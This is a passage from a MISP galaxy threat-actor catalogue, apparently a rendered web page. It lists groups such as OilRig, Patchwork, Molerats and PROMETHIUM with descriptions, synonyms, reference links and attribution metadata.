targeted-sector | ['Activists', 'Dissidents', 'Journalist', 'Civil society'] |
Related clusters
HummingBad
This group created malware that takes over Android devices and generates $300,000 per month in fraudulent ad revenue. The group effectively controls an arsenal of over 85 million mobile devices around the world, with the potential to sell access to these devices to the highest bidder.
Internal MISP references
UUID 12ab5c28-5f38-4a2f-bd40-40e9c500f4ac
which can be used as unique global reference for HummingBad
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
QUILTED TIGER
Dropping Elephant (also known as “Chinastrats” and “Patchwork”) is a relatively new threat actor that is targeting a variety of high profile diplomatic and economic targets using a custom set of attack tools. Its victims are all involved with China’s foreign relations in some way, and are generally caught through spear-phishing or watering hole attacks.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular QUILTED TIGER.
Known Synonyms |
---|
APT-C-09 |
ATK11 |
Chinastrats |
Dropping Elephant |
G0040 |
Monsoon |
Orange Athos |
Patchwork |
Sarit |
Thirsty Gemini |
ZINC EMERSON |
Internal MISP references
UUID 18d473a5-831b-47a5-97a1-a32156299825
which can be used as unique global reference for QUILTED TIGER
in MISP communities and other software using the MISP galaxy
External references
- https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=09308982-77bd-41e0-8269-f2cc9ce3266e&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments - webarchive
- https://www.forcepoint.com/blog/x-labs/monsoon-analysis-apt-campaign - webarchive
- https://www.cymmetria.com/patchwork-targeted-attack/ - webarchive
- https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf - webarchive
- https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/ - webarchive
- https://attack.mitre.org/groups/G0040/ - webarchive
- https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf - webarchive
- https://securelist.com/the-dropping-elephant-actor/75328/ - webarchive
- https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/zinc-emerson - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf - webarchive
- https://ti.qianxin.com/blog/articles/analysis-of-the-attack-activities-of-patchwork-using-the-documents-of-relevant-government-agencies-in-pakistan-as-bait - webarchive
- https://unit42.paloaltonetworks.com/atoms/thirstygemini/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | India |
cfr-suspected-victims | ['Bangladesh', 'Sri Lanka', 'Pakistan'] |
cfr-target-category | ['Private sector', 'Military'] |
cfr-type-of-incident | Espionage |
country | IN |
targeted-sector | ['Finance', 'Diplomacy'] |
Related clusters
Scarlet Mimic
Scarlet Mimic is a threat group that has targeted minority rights activists. This group has not been directly linked to a government source, but the group’s motivations appear to overlap with those of the Chinese government. While there is some overlap between IP addresses used by Scarlet Mimic and Putter Panda (APT 2), it has not been concluded that the groups are the same. The attacks began over four years ago and their targeting pattern suggests that this adversary’s primary mission is to gather information about minority rights activists. We do not have evidence directly linking these attacks to a government source, but the information derived from these activities supports an assessment that a group or groups with motivations similar to the stated position of the Chinese government in relation to these targets is involved. The attacks we attribute to Scarlet Mimic have primarily targeted Uyghur and Tibetan activists as well as those who are interested in their causes. Both the Tibetan community and the Uyghurs, a Turkic Muslim minority residing primarily in northwest China, have been targets of multiple sophisticated attacks in the past decade. Both also have a history of strained relationships with the government of the People’s Republic of China (PRC), though we do not have evidence that links Scarlet Mimic attacks to the PRC. Scarlet Mimic attacks have also been identified against government organizations in Russia and India, who are responsible for tracking activist and terrorist activities. While we do not know the precise target of each of the Scarlet Mimic attacks, many of them align to the patterns described above.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Scarlet Mimic.
Known Synonyms |
---|
G0029 |
Golfing Taurus |
Internal MISP references
UUID 0da10682-85c6-4c0b-bace-ba1f7adfb63e
which can be used as unique global reference for Scarlet Mimic
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
targeted-sector | ['Activists'] |
Related clusters
Poseidon Group
Poseidon Group is a Portuguese-speaking threat group that has been active since at least 2005. The group has a history of using information exfiltrated from victims to blackmail victim companies into contracting the Poseidon Group as a security firm.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Poseidon Group.
Known Synonyms |
---|
G0033 |
Internal MISP references
UUID 5fc09923-fcff-4e81-9cae-4518ef31cf4d
which can be used as unique global reference for Poseidon Group
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | BR |
Related clusters
DragonOK
Threat group that has targeted Japanese organizations with phishing emails. Due to overlapping TTPs, including similar custom tools, DragonOK is thought to have a direct or indirect relationship with the threat group Moafee. It is known to use a variety of malware, including Sysget/HelloBridge, PlugX, PoisonIvy, FormerFirstRat, NFlog, and NewCT.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DragonOK.
Known Synonyms |
---|
BRONZE OVERBROOK |
G0002 |
G0017 |
Moafee |
Shallow Taurus |
Internal MISP references
UUID a9b44750-992c-4743-8922-129880d277ea
which can be used as unique global reference for DragonOK
in MISP communities and other software using the MISP galaxy
External references
- https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf - webarchive
- https://attack.mitre.org/wiki/Groups - webarchive
- https://www.forcepoint.com/de/blog/x-labs/trojanized-adobe-installer-used-install-dragonok-s-new-custom-backdoor - webarchive
- https://github.com/m0n0ph1/APT_CyberCriminal_Campagin_Collections-1/blob/master/2017/2017.02.15.deep-dive-dragonok-rambo-backdoor/Deep%20Dive%20on%20the%20DragonOK%20Rambo%20Backdoor%20_%20Morphick%20Cyber%20Security.pdf - webarchive
- https://www.cfr.org/interactive/cyber-operations/moafee - webarchive
- https://unit42.paloaltonetworks.com/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/ - webarchive
- https://www.phnompenhpost.com/national/kingdom-targeted-new-malware - webarchive
- https://attack.mitre.org/groups/G0017/ - webarchive
- https://attack.mitre.org/groups/G0002/ - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-overbrook - webarchive
- https://unit42.paloaltonetworks.com/atoms/shallowtaurus/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | China |
cfr-suspected-victims | ['United States'] |
cfr-target-category | ['Private sector'] |
cfr-type-of-incident | Espionage |
country | CN |
Related clusters
ProjectSauron
ProjectSauron is the name for a top level modular cyber-espionage platform, designed to enable and manage long-term campaigns through stealthy survival mechanisms coupled with multiple exfiltration methods. Technical details show how the attackers learned from other extremely advanced actors in order to avoid repeating their mistakes. As such, all artifacts are customized per given target, reducing their value as indicators of compromise for any other victim. Usually APT campaigns have a geographical nexus, aimed at extracting information within a specific region or from a given industry. That usually results in several infections in countries within that region, or in the targeted industry around the world. Interestingly, ProjectSauron seems to be dedicated to just a couple of countries, focused on collecting high value intelligence by compromising almost all key entities it could possibly reach within the target area. The name ProjectSauron reflects the fact that the code authors refer to ‘Sauron’ in the Lua scripts.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ProjectSauron.
Known Synonyms |
---|
G0041 |
Project Sauron |
Sauron |
Strider |
Internal MISP references
UUID f3179cfb-9c86-4980-bd6b-e4fa74adaaa7
which can be used as unique global reference for ProjectSauron
in MISP communities and other software using the MISP galaxy
External references
- https://securelist.com/analysis/publications/75533/faq-the-projectsauron-apt/ - webarchive
- https://www.cfr.org/interactive/cyber-operations/project-sauron - webarchive
- https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07190154/The-ProjectSauron-APT_research_KL.pdf - webarchive
- https://attack.mitre.org/groups/G0041/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | United States |
cfr-suspected-victims | ['Russia', 'Iran', 'Belgium', 'China', 'Sweden', 'Rwanda'] |
cfr-target-category | ['Government', 'Military'] |
cfr-type-of-incident | Espionage |
country | US |
targeted-sector | ['Intelligence'] |
Related clusters
TA530
TA530, who we previously examined in relation to large-scale personalized phishing campaigns
Internal MISP references
UUID 4b79d1f6-8333-44b6-ac32-d1ea7e47e77f
which can be used as unique global reference for TA530
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
GCMAN
GCMAN is a threat group that focuses on targeting banks for the purpose of transferring money to e-currency services.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GCMAN.
Known Synonyms |
---|
G0036 |
Internal MISP references
UUID d93889de-b4bc-4a29-9ce7-d67717c140a0
which can be used as unique global reference for GCMAN
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | RU |
targeted-sector | ['Bank'] |
Related clusters
APT22
Suckfly is a China-based threat group that has been active since at least 2014.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular APT22.
Known Synonyms |
---|
BRONZE OLIVE |
G0039 |
Group 46 |
Suckfly |
Internal MISP references
UUID 5abb12e7-5066-4f84-a109-49a037205c76
which can be used as unique global reference for APT22
in MISP communities and other software using the MISP galaxy
External references
- https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=62e325ae-f551-4855-b9cf-28a7d52d1534&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments - webarchive
- https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=7a60af1f-7786-446c-976b-7c71a16e9d3b&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments - webarchive
- https://attack.mitre.org/groups/G0039/ - webarchive
- https://exchange.xforce.ibmcloud.com/collection/Suckfly-APT-aa8af56fd12d25c98fc49ca5341160ab - webarchive
- http://www.slideshare.net/CTruncer/ever-present-persistence-established-footholds-seen-in-the-wild - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-olive - webarchive
- https://www.mandiant.com/resources/insights/apt-groups - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
Related clusters
FIN6
FIN6 is a group targeting financial assets, including systems able to perform financial transactions such as point-of-sale (PoS) terminals.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular FIN6.
Known Synonyms |
---|
ATK88 |
Camouflage Tempest |
G0037 |
GOLD FRANKLIN |
ITG08 |
MageCart Group 6 |
SKELETON SPIDER |
White Giant |
Internal MISP references
UUID 647894f6-1723-4cba-aba4-0ef0966d5302
which can be used as unique global reference for FIN6
in MISP communities and other software using the MISP galaxy
External references
- https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf - webarchive
- https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html - webarchive
- https://attack.mitre.org/groups/G0037/ - webarchive
- https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/ - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-franklin - webarchive
- https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
Related clusters
Libyan Scorpions
Libyan Scorpions is a malware operation in use since September 2015 and operated by a politically motivated group whose main objective is intelligence gathering: spying on influential and political figures and running an espionage campaign within Libya.
Internal MISP references
UUID 815cbe98-e157-4078-9caa-c5a25dd64731
which can be used as unique global reference for Libyan Scorpions
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | LY |
targeted-sector | ['Intelligence'] |
TeamXRat
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular TeamXRat.
Known Synonyms |
---|
CorporacaoXRat |
CorporationXRat |
Internal MISP references
UUID 43ec65d1-a334-4c44-9a44-0fd21f27249d
which can be used as unique global reference for TeamXRat
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
OilRig
OilRig is an Iranian threat group operating primarily in the Middle East by targeting organizations in this region that are in a variety of different industries; however, this group has occasionally targeted organizations outside of the Middle East as well. It also appears OilRig carries out supply chain attacks, where the threat group leverages the trust relationship between organizations to attack their primary targets.
OilRig is an active and organized threat group, which is evident based on their systematic targeting of specific organizations that appear to be carefully chosen for strategic purposes. Attacks attributed to this group primarily rely on social engineering to exploit the human rather than software vulnerabilities; however, on occasion this group has used recently patched vulnerabilities in the delivery phase of their attacks. The lack of software vulnerability exploitation does not necessarily suggest a lack of sophistication, as OilRig has shown maturity in other aspects of their operations. Such maturities involve:
- Organized evasion testing used during the development of their tools.
- Use of custom DNS tunneling protocols for command and control (C2) and data exfiltration.
- Custom web shells and backdoors used to persistently access servers.
OilRig relies on stolen account credentials for lateral movement. After OilRig gains access to a system, they use credential dumping tools, such as Mimikatz, to steal credentials of accounts logged into the compromised system. The group uses these credentials to access and move laterally to other systems on the network. After obtaining credentials from a system, operators in this group prefer to use tools other than their backdoors to access the compromised systems, such as Remote Desktop and PuTTY. OilRig also uses phishing sites to harvest the credentials of individuals at targeted organizations to gain access to internet accessible resources, such as Outlook Web Access.
Since at least 2014, an Iranian threat group tracked by FireEye as APT34 has conducted reconnaissance aligned with the strategic interests of Iran. The group conducts operations primarily in the Middle East, targeting financial, government, energy, chemical, telecommunications and other industries. Repeated targeting of Middle Eastern financial, energy and government organizations leads FireEye to assess that those sectors are a primary concern of APT34. The use of infrastructure tied to Iranian operations, timing and alignment with the national interests of Iran also lead FireEye to assess that APT34 acts on behalf of the Iranian government.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular OilRig.
Known Synonyms |
---|
APT 34 |
APT34 |
ATK40 |
Cobalt Gypsy |
Crambus |
EUROPIUM |
Evasive Serpens |
G0049 |
Hazel Sandstorm |
Helix Kitten |
IRN2 |
TA452 |
Twisted Kitten |
Internal MISP references
UUID 42be2a84-5a5c-4c6d-9864-3f09d75bb0ba
which can be used as unique global reference for OilRig
in MISP communities and other software using the MISP galaxy
External references
- https://blog.morphisec.com/iranian-fileless-cyberattack-on-israel-word-vulnerability - webarchive
- https://unit42.paloaltonetworks.com/unit42-striking-oil-closer-look-adversary-infrastructure/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-introducing-the-adversary-playbook-first-up-oilrig/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-twoface-webshell-persistent-access-point-lateral-movement/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-oilrig-actors-provide-glimpse-development-testing-efforts/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-analyzing-oilrigs-ops-tempo-testing-weaponization-delivery/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-oilrig-group-steps-attacks-new-delivery-documents-new-injector-trojan/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/ - webarchive
- https://unit42.paloaltonetworks.com/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/ - webarchive
- https://pan-unit42.github.io/playbook_viewer/ - webarchive
- https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html - webarchive
- https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html - webarchive
- https://www.gov.il/BlobFolder/reports/attack_il/he/CERT-IL-ALERT-W-120.pdf - webarchive
- https://www.forbes.com/sites/thomasbrewster/2017/02/15/oilrig-iran-hackers-cyberespionage-us-turkey-saudi-arabia/#56749aa2468a - webarchive
- https://raw.githubusercontent.com/pan-unit42/playbook_viewer/master/playbook_json/oilrig.json - webarchive
- https://www.cfr.org/interactive/cyber-operations/oilrig - webarchive
- https://www.cfr.org/interactive/cyber-operations/apt-34 - webarchive
- https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-november-helix-kitten/ - webarchive
- https://symantec-blogs.broadcom.com/blogs/threat-intelligence/shamoon-destructive-threat-re-emerges-new-sting-its-tail - webarchive
- https://web.archive.org/web/20120818235442/https://www.symantec.com/connect/blogs/shamoon-attacks - webarchive
- https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ad6f8259-2bb4-4f7f-b8e1-710b35a4cbed&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments - webarchive
- https://www.clearskysec.com/oilrig/ - webarchive
- https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems/ - webarchive
- https://attack.mitre.org/groups/G0049/ - webarchive
- https://unit42.paloaltonetworks.com/oilrig-novel-c2-channel-steganography/ - webarchive
- https://www.secureworks.com/research/threat-profiles/cobalt-gypsy - webarchive
- https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf - webarchive
- https://www.wired.com/story/apt-34-iranian-hackers-critical-infrastructure-companies/ - webarchive
- https://unit42.paloaltonetworks.com/atoms/evasive-serpens/ - webarchive
- https://www.microsoft.com/security/blog/2022/09/08/microsoft-investigates-iranian-attacks-against-the-albanian-government/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
cfr-suspected-state-sponsor | Iran (Islamic Republic of) |
cfr-suspected-victims | ['Israel', 'Kuwait', 'United States', 'Turkey', 'Saudi Arabia', 'Qatar', 'Lebanon', 'Middle East'] |
cfr-target-category | ['Government', 'Private sector', 'Civil society'] |
cfr-type-of-incident | Espionage |
country | IR |
targeted-sector | ['Chemical', 'Energy', 'Engineering', 'Finance', 'Government, Administration', 'Telecoms', 'Other'] |
Related clusters
Volatile Cedar
Beginning in late 2012, a carefully orchestrated attack campaign we call Volatile Cedar has been targeting individuals, companies and institutions worldwide. This campaign, led by a persistent attacker group, has successfully penetrated a large number of targets using various attack techniques, and specifically, a custom-made malware implant codenamed Explosive.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Volatile Cedar.
Known Synonyms |
---|
DeftTorero |
Lebanese Cedar |
Internal MISP references
UUID cf421ce6-ddfe-419a-bc65-6a9fc953232a
which can be used as unique global reference for Volatile Cedar
in MISP communities and other software using the MISP galaxy
External references
- https://blog.checkpoint.com/2015/03/31/volatilecedar/ - webarchive
- https://blog.checkpoint.com/2015/06/09/new-data-volatile-cedar/ - webarchive
- https://securelist.com/sinkholing-volatile-cedar-dga-infrastructure/69421/ - webarchive
- https://www.clearskysec.com/wp-content/uploads/2021/01/Lebanese-Cedar-APT.pdf - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/03/20082004/volatile-cedar-technical-report.pdf - webarchive
- https://securelist.com/defttorero-tactics-techniques-and-procedures/107610/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
country | LB |
suspected-victims | ['Middle East', 'Israel', 'Lebanon', 'Saudi Arabia'] |
Related clusters
Dancing Salome
Dancing Salome is the Kaspersky codename for an APT actor with a primary focus on ministries of foreign affairs, think tanks, and Ukraine. What makes Dancing Salome interesting and relevant is the attacker’s penchant for leveraging HackingTeam RCS implants compiled after the public breach.
Internal MISP references
UUID 3d5192f2-f235-46fd-aa68-dd00cc17d632
which can be used as unique global reference for Dancing Salome
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
suspected-victims | ['Ukraine'] |
targeted-sector | ['Think Tanks', 'Government, Administration'] |
TERBIUM
Microsoft Threat Intelligence identified similarities between this recent attack and previous 2012 attacks against tens of thousands of computers belonging to organizations in the energy sector. Microsoft Threat Intelligence refers to the activity group behind these attacks as TERBIUM, following our internal practice of assigning rogue actors chemical element names.
Internal MISP references
UUID 46670c51-fea4-45d6-bdd4-62e85a5c7404
which can be used as unique global reference for TERBIUM
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
targeted-sector | ['Energy'] |
Molerats
In October 2012, malware attacks against Israeli government targets grabbed media attention as officials temporarily cut off Internet access for the entire police force and banned the use of USB memory sticks. Security researchers subsequently linked these attacks to a broader, year-long campaign that targeted not just Israelis but Palestinians as well and, as discovered later, even the U.S. and UK governments. Further research revealed a connection between these attacks and members of the so-called "Gaza Hackers Team." We refer to this campaign as "Molerats."
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Molerats.
Known Synonyms |
---|
ALUMINUM SARATOGA |
BLACKSTEM |
Extreme Jackal |
G0021 |
Gaza Cybergang |
Gaza Hackers Team |
Gaza cybergang |
Moonlight |
Operation Molerats |
Internal MISP references
UUID f7c2e501-73b1-400f-a5d9-2e2e07b7dfde
which can be used as unique global reference for Molerats
in MISP communities and other software using the MISP galaxy
External references
- https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html - webarchive
- https://ti.360.net/blog/articles/suspected-molerats-new-attack-in-the-middle-east/ - webarchive
- https://ti.360.net/blog/articles/suspected-molerats-new-attack-in-the-middle-east-en/ - webarchive
- https://middle-east-online.com/en/cyber-war-gaza-hackers-deface-israel-fire-service-website - webarchive
- https://www.fireeye.com/blog/threat-research/2014/06/molerats-here-for-spring.html - webarchive
- https://pwc.blogs.com/cyber_security_updates/2015/04/attacks-against-israeli-palestinian-interests.html - webarchive
- https://www.vectra.ai/blogpost/moonlight-middle-east-targeted-attacks - webarchive
- https://securelist.com/gaza-cybergang-wheres-your-ir-team/72283/ - webarchive
- https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf - webarchive
- https://www.clearskysec.com/wp-content/uploads/2016/06/Operation-DustySky2_-6.2016_TLP_White.pdf - webarchive
- https://securelist.com/gaza-cybergang-updated-2017-activity/82765/ - webarchive
- https://www.kaspersky.com/blog/gaza-cybergang/26363/ - webarchive
- https://attack.mitre.org/groups/G0021/ - webarchive
- https://www.secureworks.com/research/threat-profiles/aluminum-saratoga - webarchive
- https://services.google.com/fh/files/misc/tool-of-first-resort-israel-hamas-war-cyber.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
cfr-suspected-state-sponsor | Palestine |
cfr-suspected-victims | ['United States', 'Israel', 'Palestine', 'Middle East', 'Europe'] |
cfr-target-category | ['Government', 'Defense', 'Energy', 'Finance', 'Healthcare', 'Pharmaceuticals', 'Education', 'Media', 'NGOs', 'Civil Society', 'Legal', 'Military'] |
cfr-type-of-incident | Espionage |
country | PS |
PROMETHIUM
PROMETHIUM is an activity group that has been active since at least 2012. The group primarily uses Truvasys, a first-stage malware that has been in circulation for several years. Truvasys has been involved in several attack campaigns, in which it has masqueraded as one of several common computer utilities, including WinUtils, TrueCrypt, WinRAR, or SanDisk. In each of the campaigns, Truvasys evolved with additional features; this shows a close relationship between the activity groups behind the campaigns and the developers of the malware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PROMETHIUM.
Known Synonyms |
---|
G0056 |
StrongPity |
Internal MISP references
UUID 43894e2a-174e-4931-94a8-2296afe8f650
which can be used as unique global reference for PROMETHIUM
in MISP communities and other software using the MISP galaxy
External references
- https://www.microsoft.com/security/blog/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/ - webarchive
- https://www.virusbulletin.com/conference/vb2016/abstracts/last-minute-paper-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users - webarchive
- https://attack.mitre.org/groups/G0056/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | TR |
NEODYMIUM
NEODYMIUM is an activity group that is known to use a backdoor malware detected by Microsoft as Wingbird. This backdoor’s characteristics closely match FinFisher, a government-grade commercial surveillance package. Data about Wingbird activity indicate that it is typically used to attack individual computers instead of networks.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular NEODYMIUM.
Known Synonyms |
---|
G0055 |
Internal MISP references
UUID ada08ea8-4517-4eea-aff1-3ad69e5466bb
which can be used as unique global reference for NEODYMIUM
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
Packrat
A threat group that has been active for at least seven years has used malware, phishing and disinformation tactics to target activists, journalists, politicians and public figures in various Latin American countries. The threat actor, dubbed Packrat based on its preference for remote access Trojans (RATs) and because it has used the same infrastructure for several years, has been analyzed by Citizen Lab researchers John Scott-Railton, Morgan Marquis-Boire, and Claudio Guarnieri, and Cyphort researcher Marion Marschalek, best known for her extensive analysis of state-sponsored threats.
Internal MISP references
UUID fe344665-d153-4d31-a32a-1509efde1ca7
which can be used as unique global reference for Packrat
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
targeted-sector | ['Activists', 'Journalist', 'Political party'] |
Cadelle
Symantec telemetry identified Cadelle and Chafer activity dating back as far as July 2014; however, it is likely that activity began well before this date. Command-and-control (C&C) registrant information points to activity possibly as early as 2011, while executable compilation times suggest early 2012. Their attacks continue to the present day. Symantec estimates that each team is made up of between 5 and 10 people.
Internal MISP references
UUID 03f13462-003c-4296-8784-bccea16710a9
which can be used as unique global reference for Cadelle
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | IR |
PassCV
The PassCV group continues to be one of the most successful and active threat groups that leverage a wide array of stolen Authenticode-signing certificates. Snorre Fagerland of Blue Coat Systems first coined the term PassCV in a blog post. His post provides a good introduction to the group and covers some of the older infrastructure, stolen code-signing certificate reuse, and other connections associated with the PassCV malware. There are several clues alluding to the possibility that multiple groups may be utilizing the same stolen signing certificates, but at this time SPEAR believes the current attacks are more likely being perpetrated by a single group employing multiple publicly available Remote Administration Tools (RATs). The PassCV group has been operating with continued success and has already started to expand their malware repertoire into different off-the-shelf RATs and custom code. SPEAR identified eighteen previously undisclosed stolen Authenticode certificates. These certificates were originally issued to companies and individuals scattered across China, Taiwan, Korea, Europe, the United States and Russia. In this post we expand the usage of the term ‘PassCV’ to encompass the malware mentioned in the Blue Coat Systems report, as well as the APT group behind the larger C2 infrastructure and stolen Authenticode certificates. We’d like to share some of our findings as they pertain to the stolen certificates, command and control infrastructure, and some of the newer custom RATs they’ve begun development on.
Internal MISP references
UUID ceae0bc4-eb5f-4184-b949-a6f7d6f0f965
which can be used as unique global reference for PassCV
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | CN |
Sath-ı Müdafaa
A Turkish hacking group, Sath-ı Müdafaa, is encouraging individuals to join its DDoS-for-Points platform, which awards points and prizes for carrying out distributed denial-of-service (DDoS) attacks against a list of predetermined targets. Their DDoS tool also contains a backdoor that compromises the volunteers who run it, so the overarching motivation and allegiance of the group is not entirely clear.
Internal MISP references
UUID a03e2b4b-617f-4d28-ac4b-9943f792aa22
which can be used as unique global reference for Sath-ı Müdafaa
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | TR |
motive | Hacktivists-Nationalists |
Aslan Neferler Tim
Turkish nationalist hacktivist group that has been active for roughly one year. According to DomainTools, the group's site has been registered since December 2015, with an active Twitter account since January 2016. The group carries out distributed denial-of-service (DDoS) attacks and defacements against the sites of news organizations and governments perceived to be critical of Turkey's policies or leadership, and purports to act in defense of Islam.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Aslan Neferler Tim.
Known Synonyms |
---|
Lion Soldiers Team |
Phantom Turk |
Internal MISP references
UUID 23410d3f-c359-422d-9a4e-45f8fdf0c84a
which can be used as unique global reference for Aslan Neferler Tim
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | TR |
motive | Hacktivists-Nationalists |
targeted-sector | ['Government, Administration', 'News - Media'] |
Ayyıldız Tim
Ayyıldız (Crescent and Star) Tim is a nationalist hacking group founded in 2002. It performs defacements and DDoS attacks against the websites of governments that it considers to be repressing Muslim minorities or engaged in Islamophobic policies.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ayyıldız Tim.
Known Synonyms |
---|
Crescent and Star |
Internal MISP references
UUID ab1771de-25bb-4688-b132-eabb5d6452a1
which can be used as unique global reference for Ayyıldız Tim
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
attribution-confidence | 50 |
country | TR |
motive | Hacktivists-Nationalists |
targeted-sector | ['Government, Administration'] |
TurkHackTeam
